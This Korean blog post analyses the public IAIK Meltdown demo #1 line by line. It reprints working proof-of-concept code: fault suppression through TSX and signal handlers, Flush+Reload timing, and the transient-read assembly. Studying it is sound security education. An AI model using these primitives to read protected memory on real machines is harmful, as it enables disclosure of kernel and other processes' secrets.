Analyze the Meltdown demo #1: A first test(test)

Demo #1

Demo #1은 간단하게 현재 실험 PC가 meltdown에 취약한지, 즉 meltdown 공격으로 exploit 가능한 환경인지 test 하는 demo이다.

기존의 isolation mecahnism을 breaking 하는 것이 아니라 user 자신의 address space를 meltdown 공격을 이용해 읽어들인다.

만일 demo 1에 실패했다면... CPU 문제(2010 이전의 CPU, 혹은 최신 실리콘 패치가 완료된 CPU) 등이 있을 수 있으니 반드시 demo 1이 정상적으로 작동하는 것을 확인하고 이후 demo로 넘어가는 것을 추천한다.

Build & Run

$ make
$ taskset 0x1 ./test

정상적인 결과화면은 다음과 같다.

Expect: Pay no attention to the content of this string
   Got: Pay no attention to the content of this string

Demo #1 source 분석

Demo #1에서 사용된 test.c의 소스코드는 다음과 같다.

main 함수부터 line by line으로 분석할 것이다. (code 1. 참고)

  1 #include "libkdump.h"
  2 #include <stdio.h>
  3 #include <stdlib.h>
  4 #include <string.h>
  5 #include <time.h>
  6 
  7 const char *strings[] = {
  8     "If you can read this, at least the auto configuration is working",
  9     "Generating witty test message...",
 10     "Go ahead with the real exploit if you dare",
 11     "Have a good day.",
 12     "Welcome to the wonderful world of microarchitectural attacks",
 13     "Pay no attention to the content of this string",
 14     "Please wait while we steal your secrets...",
 15     "Would you like fries with that?",
 16     "(insert random quote here)",
 17     "Don't panic...",
 18     "Wait, do you smell something burning?",
 19     "How did you get here?"};
 20 
 21 int main(int argc, char *argv[]) {
 22   libkdump_config_t config;
 23   config = libkdump_get_autoconfig();
 24   libkdump_init(config);
 25 
 26   srand(time(NULL));
 27   const char *test = strings[rand() % (sizeof(strings) / sizeof(strings[0]))];
 28   int index = 0;
 29 
 30   printf("Expect: \x1b[32;1m%s\x1b[0m\n", test);
 31   printf("   Got: \x1b[33;1m");
 32   while (index < strlen(test)) {
 33     int value = libkdump_read((size_t)(test + index));
 34     printf("%c", value);
 35     fflush(stdout);
 36     index++;
 37   }
 38 
 39   printf("\x1b[0m\n");
 40   libkdump_cleanup();
 41 
 42   return 0;
 43 }

< Code1. test.c>

Line 22: libkdump_config_t는 공격에 필요한 여러 데이터들을 structure로 관리한다. (Code 2. 참고)

/**
 * libkdump load thread action
 */
typedef enum {
    NOP, /**< Just run an endless loop */
    IO, /**< Perform I/O operations to trigger interrupts */
    YIELD /**< Continuously switch to the operating system */
} libkdump_load_t;

/**
 * libkdump configuration
 */
typedef struct {
  size_t cache_miss_threshold; /**< Cache miss threshold in cycles for Flush+Reload */
  libkdump_fault_handling_t fault_handling; /**< Type of fault handling (TSX or signal handler) */
  int measurements; /**< Number of measurements to perform for one address */
  int accept_after; /**< How many measurements must be the same to accept the read value */
  int load_threads; /**< Number of threads which are started to increase the chance of reading from inaccessible addresses */
  libkdump_load_t load_type; /**< Function the load threads should execute */
  int retries; /**< Number of Meltdown retries for an address */
  size_t physical_offset; /**< Address of the physical direct map */
} libkdump_config_t;

<Code 2. libkdump.h - libkdump_config_t structure>

Line 23: Line 22에서 선언한 config 자료구조를 default value로 초기화한다.

libkdump_get_autoconfig() 함수는 libkdump.c에서 찾아볼 수 있다. (Code 3. 참고)

Line 23에서 호출한 libkdump_get_autoconfig()는 auto_config() 함수를 호출하고 auto_config() 함수는 다음과 같은 일을 수행한다.

static libkdump_config_t config;

libkdump_config_t libkdump_get_autoconfig() {
  auto_config();
  return config;
}

static void auto_config() {
  debug(INFO, "Auto configuration\n");
  detect_fault_handling();
  detect_flush_reload_threshold();
  config.measurements = 3;
  config.accept_after = 1;
  config.load_threads = 1;
  config.load_type = NOP;
  config.retries = 10000;
  config.physical_offset = DEFAULT_PHYSICAL_OFFSET;
}

<Code 3. libkdump.c - auto_config()>

detect_fault_handler(): 이 함수는 meltdown 공격시 발생하는 falut를 무엇으로 suppression 할지에 대한 결정을 하는 함수이다. 일반전으로 Intel TSX가 signal hander를 사용하는 것보다 성능이 좋기 때문에 내부적으로 현재 CPU가 TSX를 지원하는지 확인하고 TSX를 support한다면 TSX를 falut suppressing 하는데 사용한다. (Code 4. 참고)

// ---------------------------------------------------------------------------
static int check_tsx() {
#if !defined(NO_TSX) && !defined(FORCE_TSX)
  if (__get_cpuid_max(0, NULL) >= 7) {
    unsigned a, b, c, d;
    __cpuid_count(7, 0, a, b, c, d);
    return (b & (1 << 11)) ? 1 : 0;
  } else
    return 0;
#elif defined(FORCE_TSX)
  return 1;
#else /* defined (NO_TSX) */
  return 0;
#endif
}

// ---------------------------------------------------------------------------
static void detect_fault_handling() {
  if (check_tsx()) {
    debug(SUCCESS, "Using Intel TSX\n");
    config.fault_handling = TSX;
  } else {
    debug(INFO, "No Intel TSX, fallback to signal handler\n");
    config.fault_handling = SIGNAL_HANDLER;
  }
}

<Code 4. libkdump.c - detect_fault_handling()>

detect_flush_reload_threshold(): Meltdown 공격을 이용할 때 cache에 encoding 한 값을 recover하기 위해서 flush+reload 공격을 사용한다. flush+reload는 cache hit과 miss의 timing difference를 이용하기 때문에 data load를 하여 얻은 값이 cache hit인지 miss인지 구별해야한다. threshold를 계산할 때 "(flush_reload_time + reload_time * 2) / 3"를 하는 정확한 이유는 알지 모르지만 관습적으로 사용되는 것 같다. (Code 5. 참고)

// ---------------------------------------------------------------------------
static void detect_flush_reload_threshold() {
  size_t reload_time = 0, flush_reload_time = 0, i, count = 1000000;
  size_t dummy[16];
  size_t *ptr = dummy + 8;
  uint64_t start = 0, end = 0;

  maccess(ptr);
  for (i = 0; i < count; i++) {		// measure the cache hit cycles
    start = rdtsc();
    maccess(ptr);
    end = rdtsc();
    reload_time += (end - start);
  }
  for (i = 0; i < count; i++) {		// measure the cache miss cycles
    start = rdtsc();
    maccess(ptr);
    end = rdtsc();
    flush(ptr);
    flush_reload_time += (end - start);
  }
  reload_time /= count;			// avg cycles of cache hit
  flush_reload_time /= count;	// avg cycles of cache miss

  debug(INFO, "Flush+Reload: %zd cycles, Reload only: %zd cycles\n",
        flush_reload_time, reload_time);
  config.cache_miss_threshold = (flush_reload_time + reload_time * 2) / 3;
  debug(SUCCESS, "Flush+Reload threshold: %zd cycles\n",
        config.cache_miss_threshold);
}

<Code 5. libkdump.c - detect_flush_reload_threshold()>

config.measurements = 3: one address에 대해 3번 측정을 한다.
config.accept_after = 1: 읽은 값을 확신하기 위해서 같은 값이 한 번 이상 나와야한다.
config.load_threads = 1: inaccessible address로부터 값을 read할 가능성을 높이기 위해서 실행할 thread의 수
config.load_type = NOP: endless loop를 실행한다.
config.retries = 10000: meltdown이 an address에 대해 retry 할 횟수
config.physical_offset = DEFAULT_PHYSICAL_OFFSET: physical direct map address, 즉 0xffff880000000000ull이다.

일반적으로 "ffff880000000000 - ffffc7ffffffffff" 공간이 direct mapping of all physical memory 영역이다.

Line 24: libkdump_init(config); 함수를 실행하여 meltdown 공격을 위한 준비 단계이다.(Code 6. 참고)

// ---------------------------------------------------------------------------
int libkdump_init(const libkdump_config_t configuration) {
  int j;
  config = configuration;
  if (memcmp(&config, &libkdump_auto_config, sizeof(libkdump_config_t)) == 0) {                 // if config is not initialized
    auto_config();                                                                              // Initialize the config
  }

  int err = check_config();                                                                     // check the treshold of flush+reload
  if (err != 0) {
    errno = err;
    return -1;
  }
  _mem = malloc(4096 * 300);                                                                    // static char *_mem = NULL
  if (!_mem) {                                                                                  // for read 1 byte of value
    errno = ENOMEM;
    return -1;
  }
  mem = (char *)(((size_t)_mem & ~0xfff) + 0x1000 * 2);                                         // masking LSB 12bit with 0x1000
  memset(mem, 0xab, 4096 * 290);

  for (j = 0; j < 256; j++) {                                                                   // flush the all pages(1 byte(256 bits))
    flush(mem + j * 4096);
  }

  load_thread = malloc(sizeof(pthread_t) * config.load_threads);                                // The number of threads wich are started to increase
  void *thread_func;                                                                            // the chance of reading from inaccessble addresses
  switch (config.load_type) {
  case IO:
    thread_func = syncthread;
    break;
  case YIELD:
    thread_func = yieldthread;
    break;
  case NOP:
  default:
    thread_func = nopthread;                                                                    // nop operation with endless loop
  }

  for (j = 0; j < config.load_threads; j++) {
    int r = pthread_create(&load_thread[j], 0, thread_func, 0);
    if (r != 0) {                                                                               // if pthrea_create is failed..
      int k;
      for (k = 0; k < j; k++) {
        pthread_cancel(load_thread[k]);                                                         // Cancle the thread
      }
      free(load_thread);
      free(_mem);
      errno = r;
      return -1;
    }
  }
  debug(SUCCESS, "Started %d load threads\n", config.load_threads);

  if (config.fault_handling == SIGNAL_HANDLER) {                                                // If the CPU dose not support INTEL TSX
    if (signal(SIGSEGV, segfault_handler) == SIG_ERR) {                                         // eroll the segfault_handler
      debug(ERROR, "Failed to setup signal handler\n");
      libkdump_cleanup();
      return -1;
    }
    debug(SUCCESS, "Successfully setup signal handler\n");
  }
  return 0;
}

<Code 6. libkdump.c - libkdump_init()>

parameter로 받은 configuration 변수를 사용자가 설정했는지를 확인한다. 만일 직접 설정을 했다면 따로 configuration 변수를 초기화하지 않는다.

chekc_config() 함수를 호출하여 이전에 측정한 threshold가 올바는 값인지 확인한다.

"4KB * 300" 크기를 갖는 메모리(mem)를 할당한다. 추후 meltdown 공격으로 읽은 값을 이 메모리(배열)에 인코딩한다.

이 메모리(mem)의 staring address를 페이지 단위로 접근하도록 하위 12bit를 0으로 마스킹한다.

(처음 2개의 페이지는 사용하지 않는데.. 이유를 모르겠다...)

메모리(mem)를 구성하는 여러 페이지의 첫 번째 cache line을 flush 한다.

meltdown을 이용해 inaccessible address를 접근하여 데이터를 read할 가능성을 높이기 위해 dummy instruction을 계속 수행한는 thread를 생성한다.

만일 fault를 signal handler로 suppressing 하면 signal handler를 등록한다.

Line 26-27: strings[] 배열의 여러 string 중 하나만 선정하여 test 변수에 저장한다.

Line 32-37: test 변수가 가리키는 문자열을 한 byte 씩 meltdown을 이용해서 읽는다. libkdump_read()를 호출하여 1 byte read를 수행 (Code 7. 참고)

// ---------------------------------------------------------------------------
int __attribute__((optimize("-O0"))) libkdump_read(size_t addr) {
  phys = addr;

  char res_stat[256];
  int i, j, r;
  for (i = 0; i < 256; i++)
    res_stat[i] = 0;

  sched_yield();

  for (i = 0; i < config.measurements; i++) {
    if (config.fault_handling == TSX) {
      r = libkdump_read_tsx();
    } else {
      r = libkdump_read_signal_handler();
    }
    res_stat[r]++;
  }
  int max_v = 0, max_i = 0;

  if (dbg) {
    for (i = 0; i < sizeof(res_stat); i++) {
      if (res_stat[i] == 0)
        continue;
      debug(INFO, "res_stat[%x] = %d\n",
            i, res_stat[i]);
    }
  }

  for (i = 1; i < 256; i++) {
    if (res_stat[i] > max_v && res_stat[i] >= config.accept_after) {
      max_v = res_stat[i];
      max_i = i;
    }
  }
  return max_i;
}

<Code 7. libkdump.c - libkdump_read()>

res_stat[256] 변수를 선언한다. 이 변수는 이후 meltdown으로 읽어들인 변수 값의 횟수를 기록하는데 사용된다.

따라서 res_stat[256]의 element를 모두 0으로 초기화한다.

sched_yield()를 정확히 왜 사용하는지는 잘 모르겠다.... ㅠ

이전에 설정한 횟수만큼 한 바이트 read를 반복하고 나온 값을 res_stat[] 변수를 이용해 counting한다.

여기서 CPU가 TSX를 supporting 하는지 하지 않는지에 따라 libkdump_read_tsx()와 libkdump_read_signal_handler()로 나뉜다.

res_stat 변수중 가장 많이 나온 값을 meltdown이 읽어들인 값으로 생각한다.

좀 더 libkdump_read_tsx() 함수를 자세히 보자. (Code 8. 참고)

int __attribute__((optimize("-Os"), noinline)) libkdump_read_tsx() {
#ifndef NO_TSX
  size_t retries = config.retries + 1;
  uint64_t start = 0, end = 0;

  while (retries--) {
    if (xbegin() == _XBEGIN_STARTED) {
      MELTDOWN;
      xend();
    }
    int i;
    for (i = 0; i < 256; i++) {
      if (flush_reload(mem + i * 4096)) {
        if (i >= 1) {
          return i;
        }
      }
      sched_yield();
    }
    sched_yield();
  }
#endif
  return 0;
}

<Code 8. libkdump.c - libkdump_read_tsx()>

#ifndef NO_TSX ~ #endif는 NO_TSX가 정의되어 있지 않으면 해당 block을 실행한다는 뜻이다.

retries 변수에 일전에 설정한 retries 값을 할당한다.

xbegin() ~ xend()로 METLDOWN을 감싸 실행한다. MELTDOWN 코드가 하나의 transaction으로 실행된다.

MELTDOWN 공격으로 인해 읽어들인 값은 이전에 설정한 mem에 인코딩 될 것이고 flush_reload 기술을 이용해 이를 디코딩한다.

정상적으로 값을 읽으면 해당 값("i")를 return하고 정상적으로 값 읽기에 실패하면 0을 return 한다.

좀 더 MELTDOWN 코드를 자세히 보자. (Code 9. 참고)

#ifndef MELTDOWN
#define MELTDOWN meltdown_nonull
#endif

#ifdef __x86_64__

// ---------------------------------------------------------------------------
#define meltdown_nonull                                                        \
  asm volatile("1:\n"                                                          \
               "movzx (%%rcx), %%rax\n"                                         \
               "shl $12, %%rax\n"                                              \
               "jz 1b\n"                                                       \
               "movq (%%rbx,%%rax,1), %%rbx\n"                                 \
               :                                                               \
               : "c"(phys), "b"(mem)                                           \
               : "rax");

<Code 9. libkdump.c - libkdump_read_tsx()>

phys의 주소는 %%rcx가 mem의 주소는 %%rbx에 할당된다.

movzx (%%rcx), %%rax\n: *phys의 값을 %%rax에 mov 한다.

shl $12, %%rax: %%rax의 값을 12bit shift left 한다. (%%rax * 4096)

jax 1b\n: retry 한다.

movq (%%rbx, %%rax, 1), %%rbx\n: %%rbx에 *(mem + %%rax * 1)을 load 한다. 즉 load를 시도한다.

%%rax를 return 한다.

Metldown으로 cache에 인코딩한 값을 decoding 하기 위해서 flush_reload를 이용한다.(Code 10. 참고)

static int __attribute__((always_inline)) flush_reload(void *ptr) {
  uint64_t start = 0, end = 0;

  start = rdtsc();
  maccess(ptr);
  end = rdtsc();

  flush(ptr);

  if (end - start < config.cache_miss_threshold) {
    return 1;
  }
  return 0;
}

이전 libkdump_init() 함수에서 모든 ptr이 가리키는 주소를 flush 했기 때문에 Meltdown 공격에 의해 encoding 된 값만 cache에 load되어 있을 것이다.

각각, ptr을 접근하는데 걸리는 시간을 측정하고 다음 바이트 읽을 때 사용을 위해 ptr을 flush한다.

ptr을 load하는데 걸리는 시간이 cache hit과 같으면 return 1을 하여 성공적으로 byte 읽기에 성공했음을 말한다.

참고문헌: github.com/IAIK/meltdown

저작자표시 비영리 변경금지

'CPU side-channel attack' 카테고리의 다른 글

[Paper Review] AMD Prefetch Attacks through Power and Time (0)	2023.01.26
[Ubuntu 20.04] How to disable the KPTI (0)	2021.01.20

marco